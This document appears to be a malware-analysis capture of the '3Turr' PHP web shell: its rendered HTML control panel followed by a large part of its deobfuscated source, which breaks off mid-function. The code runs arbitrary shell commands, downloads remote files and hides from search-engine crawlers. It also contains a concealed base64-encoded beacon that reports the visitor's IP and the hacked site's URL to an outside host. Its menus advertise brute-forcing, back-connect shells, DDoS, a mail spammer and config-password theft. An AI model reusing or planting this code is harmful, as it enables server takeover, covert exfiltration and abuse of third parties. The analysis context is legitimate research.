<li><a href="#" onclick="g('phpeval',null,'','','')">EVAL</a></li>
<li><a href="#" onclick="g('hash',null,'','','')">HASH</a></li>
</ul>
</li><li><a href="#" onclick="g('sql',null,'','','')">SQL</a></li>
<li><a href="#">BRUTE&CRACK</a>
<ul>
<li><a href="#" onclick="g('bf',null,'','','')">CPanel</a></li>
<li><a href="#" onclick="g('bruteftp',null,'','','')">FTP</a></li>
</ul>
</li>
<li><a href="#">NETWORK</a>
<ul>
<li><a href="#" onclick="g('connect',null,'','','')">BACK CONNECT</a></li>
<li><a href="#" onclick="g('net',null,'','','')">BIND PORT</a></li>
</ul>
</li><li><a href="#" onclick="g('dos',null,'','','')">DDOS</a></li>
<li><a href="#" onclick="g('safe',null,'','','')">SAFE MODE</a></li>
<li><a href="#" onclick="g('symlink',null,'','','')">SYMLINK</a></li>
<!--
<li><a href="#" onclick="g('wp',null,'','','')">Mass Wpress</a></li>
<li><a href="#" onclick="g('joom',null,'','','')">Mass Joomla</a></li>
-->
<li><a href="#">Perl Sh3ll</a>
<ul>
<li><a href="#" onclick="g('perl',null,'','','')">CGI 1.0v</a></li>
<li><a href="#" onclick="g('perl4',null,'','','')">CGI 1.4v</a></li>
</ul>
</li>
<li><a href="#">Mirrors</a>
<ul>
<li><a href="#" onclick="g('zone',null,'','','')">Zone-h.org</a></li>
<li><a href="#" onclick="g('zonejoy',null,'','','')">Aljyyosh.org</a></li>
</ul>
</li>
<li><a href="#">TOOLS</a>
<ul>
<li><a href="#" onclick="g('rev',null,'','','')">Reverse IP</a></li>
<li><a href="#" onclick="g('zip',null,'','','')">ZIP</a></li>
<li><a href="#" onclick="g('mail',null,'','','')">Mail Spammer</a></li>
</ul>
</li>
<li><a href="#">3Turr-VIP</a>
<ul>
<li><a href="#" onclick="g('conpass',null,'','','')">C0nf1G-P4$$'s</a></li>
</ul>
</li>
<li><a href="#" onclick="g('yemen',null,'','','')">ABOUT</a></li>
</ul>
</div>
<footer id="det" style="z-index:9999;
background:#000;
position:fixed;
left:0px;
right:0px;
bottom:0px;
background:rgb(0,0,0);
padding:3px;
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000;
color:red;
">
<font align="center">3Turr ~ SH311</font>
</footer>
<form style="z-index:9999;
position:fixed;
left:1;
bottom:4px;
display:inline" onsubmit="Encoder('encod');
g('proc',null,this.c.value);
return false;
">
<input style="width:290px" type="text" id="encod" name="c" value="" placeholder="Execute" autofocus="">
<input type="submit" style="color:red;
width:30px;
" value=">>">
</form>
<!--###################-->
<form style="z-index:9999;
position:fixed;
right:10px;
bottom:3px;
display:inline;
" method="post" enctype="multipart/form-data">
<input type="hidden" name="a" value="FilesMAn">
<input type="hidden" name="c" value="
/var/www/html/">
<input type="hidden" name="p1" value="uploadFile">
<input type="hidden" name="charset" value="
Windows-1251">
<input style="border:1px solid #5BEEFF;
height:19px;
value:[ select ];
" class="toolsInp" type="file" name="f"> <input style="color:red;
width:30px;
" type="submit" value=">>"></form>
<div class="header" id="fixx"><script>p1_=p2_=p3_="";
</script>
<table width="100%" class="main" cellspacing="0" cellpadding="2">
<form name="files" method="post"></form><tbody><tr><th>Name</th><th>Size</th><th>Date Modified</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr><tr><td><a href="#" onclick="g('FilesMan','L3Zhci93d3cvaHRtbC8uLg==');
" title=""><b>| .. |</b></a></td><td>dir</td><td><a href="#" onclick="g('FilesTools',null,'..', 'touch')">2023-02-12 19:13:45</a></td><td>root/root</td><td><a href="#" onclick="g('FilesTools',null,'..','chmod')"><font color="#25ff00">drwxrwxrwx</font></a></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')"><font color="#0099FF">[REN]</font></a> <a href="#" onclick="g('FilesTools',null, '..','d2')"> <font color="red">[Del]</font> </a></td></tr><tr class="l1"><td><a href="#" onclick="g('FilesTools',null,'YmVuZXJpLnNlX21hbHdhcmVfYW5hbHlzaXM=', 'view')">beneri.se_malware_analysis</a></td><td>0 B</td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'touch')">2023-02-12 19:13:45</a></td><td>root/root</td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis','chmod')"><font color="white">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'rename')"><font color="#0099FF">[REN]</font></a> <a href="#" onclick="g('FilesTools',null, 'beneri.se_malware_analysis','e8')"><font color="#25ff00">[Edit]</font></a> <a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'download')">[DL]</a><a href="#" onclick="g('FilesTools',null, 'beneri.se_malware_analysis','d2')"> <font color="red">[Del]</font> </a></td></tr><tr><td><a href="#" onclick="g('FilesTools',null,'ZGVvYmYucGhw', 'view')">deobf.php</a></td><td>98.09 KB</td><td><a href="#" onclick="g('FilesTools',null,'deobf.php', 'touch')">2023-02-12 19:13:45</a></td><td>osboxes/osboxes</td><td><a href="#" onclick="g('FilesTools',null,'deobf.php','chmod')"><font color="white">-rw-rw-r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'deobf.php', 'rename')"><font color="#0099FF">[REN]</font></a> <a href="#" onclick="g('FilesTools',null, 'deobf.php','e8')"><font color="#25ff00">[Edit]</font></a> <a href="#" onclick="g('FilesTools',null,'deobf.php', 'download')">[DL]</a><a href="#" onclick="g('FilesTools',null, 'deobf.php','d2')"> <font color="red">[Del]</font> </a></td></tr><tr><td colspan="7">
<input type="hidden" name="a" value="FilesMan">
<input type="hidden" name="c" value="/var/www/html/">
<input type="hidden" name="charset" value="Windows-1251">
</td></tr></tbody></table></div>
</div>
<table style="border: 1px solid #5BEEFF;
border-top:0px;
" class="info" id="toolsTbl" cellpadding="5" cellspacing="5" width="100%"">
<tbody><tr>
<td><form onsubmit="Encoder('cdir');
g(null,this.c.value);
return false;
"><span>Change dir:</span><br><input id="cdir" class="toolsInp" type="text" name="c" style="color:white;
" value="
/var/www/html/"><input type="submit" s="" value=">>"></form></td>
<td><form onsubmit="Encoder('rfile');
g('FilesTools',null,this.f.value);
return false;
"><span>Read file:</span><br><input id="rfile" class="toolsInp" type="text" name="f"><input type="submit" s="" value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);
return false;
"><span>Make dir:</span><br><input id="mdir" class="toolsInp" type="text" name="d"><input type="submit" s="" value=">>"></form>
<font color="#00ff00">[ Writeable ]</font></td>
<td><form onsubmit="Encoder('mfile');
g('FilesTools',null,this.f.value,'mkfile');
return false;
"><span>Make file:</span><br><input id="mfile" class="toolsInp" type="text" name="f"><input type="submit" s="" value=">>"></form>
<font color="#00ff00">[ Writeable ]</font></td>
</tr>
</tbody></table>
<br><br>
</div>
<footer id="det" style="position:fixed;
left:0px;
right:0px;
top:0px;
background:rgb(0,0,0);
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000"></footer>
</body></html>Original PHP code
<?php @define('VERSION','2.0');
@error_reporting(1);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.1 404 Not Found');
exit;
} if (base64_decode($_POST['p1'], true) && ($_POST['p1'] != 'mkdir' && $_POST['p1'] != 'uploadFile') && ($_POST['p2'] != 'd2' ) ){ $_POST['p1'] = base64_decode(urldecode($_POST['p1']));
} $default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win") $sys='win';
else $sys='unix';
$home_cwd = @getcwd();
if(base64_decode($_REQUEST['c'], true)) $_REQUEST['c'] = base64_decode(urldecode($_REQUEST['c']));
@chdir($_REQUEST['c']);
$cwd = @getcwd();
if($sys == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
} if($cwd[strlen($cwd)-1] != '/' ) $cwd .= '/';
function yemenEx($in) { $out = '';
if (function_exists('exec')) { @exec($in,$out);
$out = @join("
",$out);
} elseif (function_exists('passthru')) { ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) { ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) { $out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) { $out = "";
while(!@feof($f)) $out .= fread($f,1024);
pclose($f);
} return $out;
} $down=@getcwd();
if($sys=="win") $down.='';
else $down.='/';
if(isset($_POST['rtdown'])) { $url = $_POST['rtdown'];
$newfname = $down. basename($url);
$file = fopen ($url, "rb");
if ($file) { $newf = fopen ($newfname, "wb");
if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
} } if ($file) { fclose($file);
} if ($newf) { fclose($newf);
} } function yemenhead() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$on="<font color=#0F0> ON </font>";
$of="<font color=red> OFF </font>";
$none="<font color=#0F0> NONE </font>";
if(function_exists('curl_version')) $curl=$on;
else $curl=$of;
if(function_exists('mysql_get_client_info')) $mysql=$on;
else $mysql=$of;
if(function_exists('mssql_connect')) $mssql=$on;
else $mssql=$of;
if(function_exists('pg_connect')) $pg=$on;
else $pg=$of;
if(function_exists('oci_connect')) $or=$on;
else $or=$of;
if(@ini_get('disable_functions')) $disfun='<span>Disabled functions : </span><font color=red style="word-wrap: break-word;
width: 80%;
" >'.@str_replace(',',', ',@ini_get('disable_functions')).'</font>';
else $disfun="<span>Disabled Functions: </span><font color=#00ff00 >All Functions Enable</font>";
if(@ini_get('safe_mode')) $safe_modes="<font color=red>ON</font>";
else $safe_modes="<font color=#0F0 >OFF</font>";
if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir');
else $open_b=$none;
if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir');
else $safe_exe=$none;
if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir');
else $safe_include=$none;
if(!function_exists('posix_getegid')) { $user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else { $uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
} $cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;
$i<$n-1;
$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0;
$j<=$i;
$j++) $cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
} $drives = "";
foreach(range('c','z') as $drive) if(is_dir($drive.':')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.base64_encode($drive.':/').'\')">[ '.$drive.' ]</a> ';
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />
<title>3Turr ~ Sh3ll</title>
<link rel="shortcut icon" type="image/x-icon" href="https://avatars1.githubusercontent.com/u/13343571?v=3&s=460">
<script language="javascript">
function Encoder(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
function Encoder2(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
</script>
<style type="text/css">
<!--
.headera {
color: red;
}
.whole {
height:auto;
width: auto;
margin-top: 10px;
margin-right: 10px;
margin-left: 10px;
background-image: linear-gradient(
rgba(0, 0, 0, 0.4),
rgba(0, 0, 0, 0.4)
), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png);
}
.header {
table-layout: fixed;
height: auto;
width: auto;
border: 4px solid #5BEEFF;
color: yellow;
font-size: 12px;
font-family: Verdana, Geneva, sans-serif;
}
tr {
display: table-row;
vertical-align: inherit;
padding-right:10px;
}table {
display: table;
border-collapse: separate;
border-spacing: 2px;
border-color: #5BEEFF;
}
.header a {color:#0F0;
text-decoration:none;
}
span {
font-weight: bolder;
color: #FFF;
}
#meunlist {
font-family: Verdana, Geneva, sans-serif;
color: #FFF;
background-color: #000;
width: auto;
border-right-width: 7px;
border-left-width: 7px;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-color: #5BEEFF;
height: auto;
font-size: 12px;
font-weight: bold;
border-top-width: 0px;
}
.whole #meunlist ul {
padding-top: 5px;
padding-right: 5px;
padding-bottom: 7px;
padding-left: 2px;
text-align:center;
list-style-type: none;
margin: 0px;
}
.whole #meunlist li {
margin: 0px;
padding: 0px;
display: inline;
}
.whole #meunlist a {
font-family: arial, sans-serif;
font-size: 14px;
text-decoration:none;
font-weight: bold;
color: #fff;
clear: both;
width: 100px;
margin-right: -6px;
padding-top: 3px;
padding-right: 15px;
padding-bottom: 3px;
padding-left: 15px;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #FFF;
}
.whole #meunlist a:hover {
color: red;
background: #fff;
}
.menu a:hover { background:#5BEEFF;
}
a:hover { color:red;
background:black;
}
.ml1 { border:1px solid #2438CF;
padding:5px;
margin:0;
overflow: auto;
}
.bigarea { width:100%;
height:250px;
border:1px solid red;
background:#171717;
}
input, textarea, select { margin:0;
color:#FF0000;
background-color:#000;
border:1px solid #5BEEFF;
font: 9pt Monospace,"Times New roman";
}
form { margin:0px;
}
#toolsTbl { text-align:center;
}
.toolsInp { width: 80%;
}
.main th {text-align:left;
background-color:#990000;
color:white;
}
.main td, th{vertical-align:middle;
}
pre {font-family:Courier,Monospace;
}
#cot_tl_fixed{position:fixed;
bottom:0px;
font-size:12px;
left:0px;
padding:4px 0;
clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);
_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);
}
}';
if(is_writable($GLOBALS['cwd'])) { echo ".foottable {
width: 300px;
font-weight: bold;
}";
} else { echo ".foottable {
width: 300px;
font-weight: bold;
background-color:red;
}
.dir {
background-color:red;
}
";
} echo '.main th{text-align:left;
}
.main a{color: #FFF;
}
.main tr:hover{background-color:red;
}
.ml1{ border:1px solid #444;
padding:5px;
margin:0;
overflow: auto;
}
.bigarea{ width:99%;
height:300px;
}
</style>
';
echo "<script>
var c_ = '" . base64_encode(htmlspecialchars($GLOBALS['cwd'])) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var p1_ = '" . ((strpos(@$_POST['p1'],"
")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p2_ = '" . ((strpos(@$_POST['p2'],"
")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_ = '" . ((strpos(@$_POST['p3'],"
")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;
else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;
else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;
else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;
else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;
else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;
else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}</script>";
echo '
</head>
<div class="whole1"></div>
<body bgcolor="#000000" color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div style="position:absolute;
top:30px;
right:50px;
font-size:25px;
font-family:auto;
z-index:-1;
" rowspan="8"><font color=red><img height="190px" height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png" /></font><center><font style="color:#5BEEFF;
text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;
">3</font><font style="color:red;
text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;
">Turr</font>
</div>
<div class="whole">
<form method=post name=mf style="display:none;
">
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>
<div class="header"><table class="headmain" width="100%" border="0" align="lift">
<tr>
<td width="3%"><span>Uname:</span></td>
<td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
</tr>
<tr>
<td><span>User:</span></td>
<td>'. $uid . ' [ ' . $user . ' ] <span> Group: </span>' . $gid . ' [ ' . $group . ' ]
</tr>
<tr>
<td><span>PHP:</span></td>
<td>'.@phpversion(). ' <span> Safe Mode: '.$safe_modes.'</span></td>
</tr>
<tr>
<td><span>IP:</span></td>
<td>'.@$_SERVER["SERVER_ADDR"].' <span>Server IP:</span> '.@$_SERVER["REMOTE_ADDR"].'</td>
</tr>
<tr>
<td><span>WEBS:</span></td>
<td width="76%">';
if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf");
if(!$d0mains) { echo "CANT READ named.conf";
} else { $count;
foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){ flush();
$count++;
} } } echo "<b>$count</b> Domains";
} } else{ echo"CANT READ |Windows|";
} echo '</td>
</tr>
<tr>
<td height="16"><span>HDD:</span></td>
<td>'.yemenSize($totalSpace).' <span>Free:</span>' . yemenSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
</tr>';
if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
foreach($userful as $item) if(yemenWhich($item)) echo $item.',';
echo '</td>
</tr>
<tr>
<td height="0" colspan="2"><span>Downloader: </span>';
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
foreach($downloaders as $item2) if(yemenWhich($item2)) echo $item2.',';
echo '</td>
</tr>';
} else { echo '<tr><td height="18" colspan="2"><span>useful: </span>';
echo '--------------</td>
</tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
</tr>';
} } else { echo '<tr><td height="18" colspan="2"><span>Window: </span>';
echo yemenEx('ver');
} echo '<tr>
<td height="16" colspan="2">'.$disfun.'</td>
</tr>
<tr>
<td height="16" colspan="2"><span>cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: </span>'.$or.'</td><td width="15%"></td>
</tr>
<tr>
<td height="11" style="width:70%" colspan="3"><span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'</td>
</tr>
<tr>
<td height="11"><span>Server </span></td>
<td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
</tr>';
if($GLOBALS[sys]=="win") { echo '<tr>
<td height="12"><span>DRIVE:</span></td>
<td colspan="2">'.$drives.'</td>
</tr>';
} echo '<tr>
<td height="12"><span>PWD:</span></td>
<td colspan="2" >'.$cwd_links.' <a href=# onclick="g(\'FilesMan\',\'' . base64_encode($GLOBALS['home_cwd']) . '\')"><font color=red >[HOME]</font></a></td>
</tr>
</table>
</div>
<div id="menu-box">
<style type="text/css">
div#menu{height:40px;
:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;
}
div#menu ul{margin:0;
padding:0;
list-style:none;
float:left;
}
div#menu ul.menu {padding-left:10px;
}
div#menu li{position:relative;
z-index:9;
margin:0;
padding:0 5px 0 0;
display:block;
float:left;
}
div#menu li:hover>ul {left:-2px;
}
div#menu a {position:relative;
z-index:10;
height:40px;
display:block;
float:left;
line-height:40px;
text-decoration:none;
font:normal 13px Trebuchet MS;
}
div#menu a:hover {color:#000;
}
div#menu li.current a {}
div#menu span {display:block;
cursor:pointer;
background-repeat:no-repeat;
background-position:95% 0;
}
div#menu ul ul a.parent span {background-position:95% 8px;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);
}
div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);
}
div#menu a {padding:0 6px 0 10px;
line-height:30px;
color:#fff;
}
div#menu span {margin-top:5px;
}
div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;
}
div#menu li.last {background:none;
}
div#menu ul ul li {background:none;
}
div#menu ul ul {position:absolute;
top:38px;
left:-999em;
width:180%;
padding:1px 0 0 0;
background:rgb(45,45,45);
margin-top:1px;
}
div#menu ul ul a {padding:0 0 0 15px;
height:auto;
float:none;
display:block;
line-height:24px;
color:rgb(169,169,169);
}
div#menu ul ul span {margin-top:0;
padding-right:15px;
_padding-right:20px;
color:rgb(169,169,169);
}
div#menu ul ul a:hover span {color:#fff;
}div#menu ul ul li.last {background:none;
}
div#menu ul ul li {width:100%;
}div#menu ul ul ul {padding:1;
margin:-38px 0 0 163px !important;
margin-left:172px;
}div#menu ul ul ul {background:rgb(41,41,41);
}
div#menu ul ul ul ul {background:rgb(38,38,38);
}div#menu ul ul ul ul {background:rgb(35,35,35);
}
div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
width:13px;
height:44px;
z-index:8;
position:absolute;
margin:-1px 0 0 -5px;
}
div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;
background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);
height:44px;
margin-right:8px;
}
</style>
<div id="menu"><ul class="menu">
<li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
<li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">SYSTEM</a></li>
<li><a href="#">PHP</a>
<ul>
<li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
<li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
</ul>
<li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
<li><a href="#" >BRUTE&CRACK</a>
<ul>
<li><a href="#" onclick="g(\'bf\',null,\'\',\'\',\'\')">CPanel</a></li>
<li><a href="#" onclick="g(\'bruteftp\',null,\'\',\'\',\'\')">FTP</a></li>
</ul>
</li>
<li><a href="#">NETWORK</a>
<ul>
<li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">BACK CONNECT</a></li>
<li><a href="#" onclick="g(\'net\',null,\'\',\'\',\'\')">BIND PORT</a></li>
</ul>
<li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
<li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
<li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
<!--
<li><a href="#" onclick="g(\'wp\',null,\'\',\'\',\'\')">Mass Wpress</a></li>
<li><a href="#" onclick="g(\'joom\',null,\'\',\'\',\'\')">Mass Joomla</a></li>
-->
<li><a href="#">Perl Sh3ll</a>
<ul>
<li><a href="#" onclick="g(\'perl\',null,\'\',\'\',\'\')">CGI 1.0v</a></li>
<li><a href="#" onclick="g(\'perl4\',null,\'\',\'\',\'\')">CGI 1.4v</a></li>
</ul>
</li>
<li><a href="#" >Mirrors</a>
<ul>
<li><a href="#" onclick="g(\'zone\',null,\'\',\'\',\'\')">Zone-h.org</a></li>
<li><a href="#" onclick="g(\'zonejoy\',null,\'\',\'\',\'\')">Aljyyosh.org</a></li>
</ul>
</li>
<li><a href="#">TOOLS</a>
<ul>
<li><a href="#" onclick="g(\'rev\',null,\'\',\'\',\'\')">Reverse IP</a></li>
<li><a href="#" onclick="g(\'zip\',null,\'\',\'\',\'\')">ZIP</a></li>
<li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')">Mail Spammer</a></li>
</ul>
</li>
<li><a href="#" >3Turr-VIP</a>
<ul>
<li><a href="#" onclick="g(\'conpass\',null,\'\',\'\',\'\')">C0nf1G-P4$$\'s</a></li>
</ul>
</li>
<li><a href="#" onclick="g(\'yemen\',null,\'\',\'\',\'\')">ABOUT</a></li>
</ul>
</div>
';
?>
<footer id="det" style="z-index:9999;
background:#000;
position:fixed;
left:0px;
right:0px;
bottom:0px;
background:rgb(0,0,0);
padding:3px;
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000;
color:red;
">
<font align=center>3Turr ~ SH311</font>
<?php function GetIP(){ if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) { $tmp = explode (',', $ip);
$ip = trim($tmp[0]);
} } else { $ip = getenv("REMOTE_ADDR");
} return $ip;
} $x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init')) { $ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if($gitt == false){ @$gitt = file_get_contents($x);
} }elseif(function_exists('file_get_contents')){ @$gitt = file_get_contents($x);
}
?>
</footer>
<form style="z-index:9999;
position:fixed;
left:1;
bottom:4px;
display:inline" onsubmit="Encoder('encod');
g('proc',null,this.c.value);
return false;
">
<input style="width:290px" type=text id=encod name=c value="" placeholder="Execute"
<?php (!isset($_POST['a']) || $_POST['a'] != 'proc' || !isset($_POST['p1']) || $_POST['p1'] == '' ) ? print("autofocus") : 0 ;
?> >
<input type=submit style="color:red;
width:30px;
" value=">>">
</form>
<!--###################-->
<form style="z-index:9999;
position:fixed;
right:10px;
bottom:3px;
display:inline;
" method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='
<?php echo htmlspecialchars($GLOBALS['cwd'])
?>'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='
<?php echo isset($_POST['charset']) ? $_POST['charset'] : ''
?>'>
<input style="border:1px solid #5BEEFF;
height:19px;
value:[ select ];
" class="toolsInp" type=file name=f > <input style="color:red;
width:30px;
" type=submit value=">>" ></form>
<?php } function yemenfooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=#00ff00 >[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table style="border: 1px solid #5BEEFF;
border-top:0px;
" class=info id=toolsTbl cellpadding=5 cellspacing=5 width=100%">
<tr>
<td><form onsubmit="Encoder('cdir');
g(null,this.c.value);
return false;
"><span>Change dir:</span><br><input id=cdir class="toolsInp" type=text name=c style="color:white;
" value="
<?php echo htmlspecialchars($GLOBALS['cwd']);
?>"><input type=submit s s value=">>"></form></td>
<td><form onsubmit="Encoder('rfile');
g('FilesTools',null,this.f.value);
return false;
"><span>Read file:</span><br><input id=rfile class="toolsInp" type=text name=f><input type=submit s s value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);
return false;
"><span>Make dir:</span><br><input id=mdir class="toolsInp" type=text name=d><input type=submit s s value=">>"></form>
<?php echo $is_writable
?></td>
<td><form onsubmit="Encoder('mfile');
g('FilesTools',null,this.f.value,'mkfile');
return false;
"><span>Make file:</span><br><input id=mfile class="toolsInp" type=text name=f><input type=submit s s value=">>"></form>
<?php echo $is_writable
?></td>
</tr>
</table>
<br><br>
</div>
<footer id="det" style="position:fixed;
left:0px;
right:0px;
top:0px;
background:rgb(0,0,0);
text-align:center;
border-top: 1px solid #ff0000;
border-bottom: 2px solid #990000"></footer>
</body></html>
<?php } if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;
} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;
} } function yemenWhich($p) { $path = yemenEx('which ' . $p);
if(!empty($path)) return $path;
return false;
} function yemenSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB';
else return $s . ' B';
} function yemenPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
